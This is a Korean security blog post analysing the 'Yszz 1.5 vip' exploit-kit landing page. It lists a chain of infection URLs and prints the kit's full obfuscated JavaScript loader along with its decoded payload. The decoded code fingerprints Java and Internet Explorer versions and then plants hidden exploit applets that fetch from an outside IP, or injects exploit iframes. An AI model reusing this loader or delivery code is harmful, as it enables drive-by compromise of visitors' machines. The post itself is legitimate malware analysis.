Malware

Yszz 1.5 vip 관련 코드 확인

Leave a comment on Yszz 1.5 vip 관련 코드 확인

오랜만에 보여서 한번 살펴봤는데 예전과 많이 달라져서 기록해 둔다.

http://festival.cocobau.com/adm_site/e_show/e_th_ad.js
L http://205.164.25.148/pic/img.js
  L http://205.164.25.148/pic/img.html
    L http://205.164.25.148/pic/XLL0zxmA.jpg (CVE?)
    L http://205.164.25.148/pic/rKQeVOG.jpg (CVE-2011-3544)
    L http://205.164.25.148/pic/9O4v7e.html (CVE-2011-1255)
      L http://205.164.25.148/pic/yNDGhP.js
    L http://205.164.25.148/pic/bmrYt.html (CVE-2012-1889)
    L http://205.164.25.148/pic/swfobject.js
    L http://205.164.25.148/pic/jpg.js
  L http://205.164.25.148/pic/css.html

img.html 파일을 디코딩 해보도록 하자. "Yszz 1.5 vip" 라는 주석이 들어가는게 특징으로 보인다.

<script type="text/javascript" src="swfobject.js"></script>
<script src=jpg.js></script>
<script language =javascript>
var K4Er = "%";
var MDIxo=K4Er+"78"+K4Er+"6F";
var OIai8=K4Er+"78"+K4Er+"6F"+K4Er+"31";
var HHYWv=K4Er+"31"+"%59"+"%53";
var CvXWz=K4Er+"7A"+"%7A"+"%31";
var JZyjl="%31"+"%6F"+"%78";
var ERb7H="%6F"+"%78";
var XGpwn2 =MDIxo+OIai8+HHYWv+CvXWz+JZyjl+ERb7H,AVgHbu2f=unescape,Cn6T4bG0znIi="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",HUx2Ydz="%64"+"%6f"+"%63"+"%75"+"%6d"+"%65"+"%6e"+"%74",sac5pxhFS="%77"+"%72"+"%69"+"%74"+"%65",ubo8KLEZHIPX2;
var kxin1s = "%53"+"%74"+"%72";
var B83pNx = kxin1s+"%69"+"%6e"+"%67";
var kxin2s = "%66"+"%72"+"%6f";
var kxin3s = "%6d"+"%43"+"%68";
var kxin4s = "%61"+"%72"+"%43";
var kxin5s = "%6f"+"%64"+"%65";
var WjuQFO = kxin2s+kxin3s+kxin4s+kxin5s;
var fxTmFiR = AVgHbu2f(B83pNx);
var xZW9RVt = AVgHbu2f(WjuQFO);
var sATWUn = "%41"+"%72"+"%72"+"%61"+"%79";
var x83QqGV = AVgHbu2f(sATWUn);
var SnDN8 = "%73"+"%74"+"%72";
var Z0b9A = "%63"+"%68"+"%61"+"%72"+"%43"+"%6f"+"%64"+"%65"+"%41"+"%74";
var fkPj5 = AVgHbu2f(SnDN8);
var hyYQ8 = AVgHbu2f(Z0b9A);
function tzWmUni(str){var out,i,len,c;var char2,char3;out=[];len=str.length;i=0;while(i<len){c=fkPj5[hyYQ8](i++);switch(c>>4)
{case 0:case 1:case 2:case 3:case 4:case 5:case 6:case 7:out[out.length]=str.charAt(i-1);break;case 12:case 13:char2=fkPj5[hyYQ8](i++);out[out.length]=window[fxTmFiR][xZW9RVt](((c&0x1F)<<6)|(char2&0x3F));break;case 14:char2=fkPj5[hyYQ8](i++);char3=fkPj5[hyYQ8](i++);out[out.length]=window[fxTmFiR][xZW9RVt](((c&0x0F)<<12)|((char2&0x3F)<<6)|((char3&0x3F)<<0));break;}}
return out.join('');}
var ZjykejU6Chars=new window[x83QqGV](-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,62,-1,-1,-1,63,52,53,54,55,56,57,58,59,60,61,-1,-1,-1,-1,-1,-1,-1,0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,-1,-1,-1,-1,-1,-1,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,-1,-1,-1,-1,-1);
HUx2Ydz=AVgHbu2f(HUx2Ydz);
function ZjykejU6(str)
{var YS1,YS2,YS3,YS4;/*Yszz 1.5 vip*/var i,len,out;
len=str.length;i=0;out = "";
while(i<len)
{do{YS1=ZjykejU6Chars[str.charCodeAt(i++)&0xff]}while(i<len&&YS1==-1);
if(YS1==-1)
break;do{YS2=ZjykejU6Chars[str.charCodeAt(i++)&0xff]}while(i<len&&YS2==-1);
if(YS2==-1)
break;out+=window[fxTmFiR][xZW9RVt]((YS1<<2)|((YS2&0x30)>>4));
do{YS3=str.charCodeAt(i++)&0xff;if(YS3==61)
return out;
YS3=ZjykejU6Chars[YS3]}while(i<len&&YS3==-1);
if(YS3==-1)
break;out+=window[fxTmFiR][xZW9RVt](((YS2&0XF)<<4)|((YS3&0x3C)>>2));
do{YS4=str.charCodeAt(i++)&0xff;if(YS4==61)
return out;YS4=ZjykejU6Chars[YS4]}while(i<len&&YS4==-1);if(YS4==-1)
break;out+=window[fxTmFiR][xZW9RVt](((YS3&0x03)<<6)|YS4)}
return out}
function long2str(v,w){var vl=v.length;var sl=v[vl-1]&0xffffffff;for(var i=0;i<vl;i++)
{v[i]=window[fxTmFiR][xZW9RVt](v[i]&0xff,v[i]>>>8&0xff,v[i]>>>16&0xff,v[i]>>>24&0xff);}
if(w){return v.join('').substring(0,sl);}
else{return v.join('');}}
function str2long(s,w){var len=s.length;var v=[];for(var i=0;i<len;i+=4)
{v[i>>2]=s.charCodeAt(i)|s.charCodeAt(i+1)<<8|s.charCodeAt(i+2)<<16|s.charCodeAt(i+3)<<24;}
if(w){v[v.length]=len;}
return v;}
ubo8KLEZHIPX2=AVgHbu2f(XGpwn2);
function kaixin(str,Udkz){if(str==""){return"";}
var v=str2long(str,false);var k=str2long(Udkz,false);var n=v.length-1;var z=v[n-1],y=v[0],delta=0x9E3779B9;var mx,e,q=Math.floor(6+52/(n+1)),sum=q*delta&0xffffffff;while(sum!=0){e=sum>>>2&3;for(var p=n;p>0;p--){z=v[p-1];mx=(z>>>5^y<<2)+(y>>>3^z<<4)^(sum^y)+(k[p&3^e]^z);y=v[p]=v[p]-mx&0xffffffff;}
z=v[n];mx=(z>>>5^y<<2)+(y>>>3^z<<4)^(sum^y)+(k[p&3^e]^z);y=v[0]=v[0]-mx&0xffffffff;sum=sum-delta&0xffffffff;}
return long2str(v,true);}
sac5pxhFS=AVgHbu2f(sac5pxhFS);
JS0W=Cn6T4bG0znIi;
JS0W=tzWmUni(kaixin(ZjykejU6(JS0W), ubo8KLEZHIPX2));
window[HUx2Ydz][sac5pxhFS] (JS0W);
</script>

위는 원본 코드이고 디코딩을 하려면 복잡해 보이지면 결국 JS0W 내용만 보면 될것으로 보이므로 마지막을 아래와 같이 변경한다.

window[HUx2Ydz][sac5pxhFS] (JS0W); ==> alert(JS0W);

아래는 디코딩 된 결과이다.

<script type="text/javascript">
var RWkTTC8=navigator.userAgent.toLowerCase();
if(document.cookie.indexOf("Udz1szV=")==-1 && RWkTTC8.indexOf("bot")==-1 && RWkTTC8.indexOf("spider")==-1 && RWkTTC8.indexOf("linux")==-1)
{
var jHiJb2=deconcept.SWFObjectUtil.getPlayerVersion();
var expires=new Date();
expires.setTime(expires.getTime()+24*60*60*1000);
document.cookie="Udz1szV=Yes;path=/;expires="+expires.toGMTString();
var kaixiny=document.createElement('body');
document.body.appendChild(kaixiny);
var kaixinm=deployJava.getJREs()+"";
kaixinm=parseInt(kaixinm.replace(/\.|\_/g,''));
if (kaixinm<=17006)
{
var kaixin=document.createElement('applet');
kaixin.width="1";
kaixin.height="1";
if((kaixinm<=16027 && kaixinm>=16000) || (kaixinm>=15000 && kaixinm<=15031))
{
kaixin.archive="XLL0zxmA.jpg";        
kaixin.code="GondadGondadExp.class";
kaixin.setAttribute("dota","http://69.46.87.103/img/jpg.css");
document.body.appendChild(kaixin);
}
else if ((kaixinm<=17003 && kaixinm>=17000) || (kaixinm<=16032 && kaixinm>=16000) ||(kaixinm>=15035 && kaixinm<=15000))
{
kaixin.archive="rKQeVOG.jpg";        
kaixin.code="gond1723.Gondattack.class";    
kaixin.setAttribute("xiaomaolv","http://69.46.87.103/img/jpg.css");    
kaixin.setAttribute("bn","woyouyizhixiaomaolv");
kaixin.setAttribute("si","conglaiyebuqi");
kaixin.setAttribute("bs","748");    
document.body.appendChild(kaixin);
}
else
{
var ques3 = window.navigator.userAgent.toLowerCase();
if (ques3.indexOf("msie 6") > -1)
 {
document.write("<OBJECT classid='clsid:8AD9C840-044E-11D1-B3E9-00805F499D93' width='200' height='200'><param name=xiaomaolv value= 'http://69.46.87.103/img/jpg.css'><param name=bn value= 'woyouyizhixiaomaolv'><param name=si value= 'conglaiyebuqi'><param name=bs value= '748'><param name=CODE value= 'cve2012xxxx.Gondvv.class'><param name=archive value= 'csEpI.jpg'></OBJECT>");
}
else
    {
        document.write("<br>");
        var kaixinq = document.createElement("body");
        document.body.appendChild(kaixinq);
        var kaixiny = document.createElement("applet");
        kaixiny.width = "256";
        kaixiny.height = "256";
        kaixiny.archive = "csEpI.jpg";
        kaixiny.code = "cve2012xxxx.Gondvv.class";
        kaixiny.setAttribute("xiaomaolv", "http://69.46.87.103/img/jpg.css");
        kaixiny.setAttribute("bn", "woyouyizhixiaomaolv");
        kaixiny.setAttribute("si", "conglaiyebuqi");
        kaixiny.setAttribute("bs", "748");
        document.body.appendChild(kaixiny);
    }
 }
}
else {

       var pcss=navigator.userAgent.toLowerCase();
       var UaYcKzD2 = window.navigator.userAgent.toLowerCase();
       if ((UaYcKzD2.indexOf('msie 8.0') > -1))
       {

        document.writeln("<iframe src=9O4v7e.html><\/iframe>");

       }

       else if ((UaYcKzD2.indexOf('msie 6.0') > -1) || (UaYcKzD2.indexOf('msie 7.0') > -1))
        {

     document.writeln("<iframe src=bmrYt.html><\/iframe>");

        }

}
}
</script>

다양한 취약점을 이용하고 있다. 대세는 JAVA 인듯?

ByJJoon

답글 남기기

이메일 주소는 공개되지 않습니다. 필수 필드는 *로 표시됩니다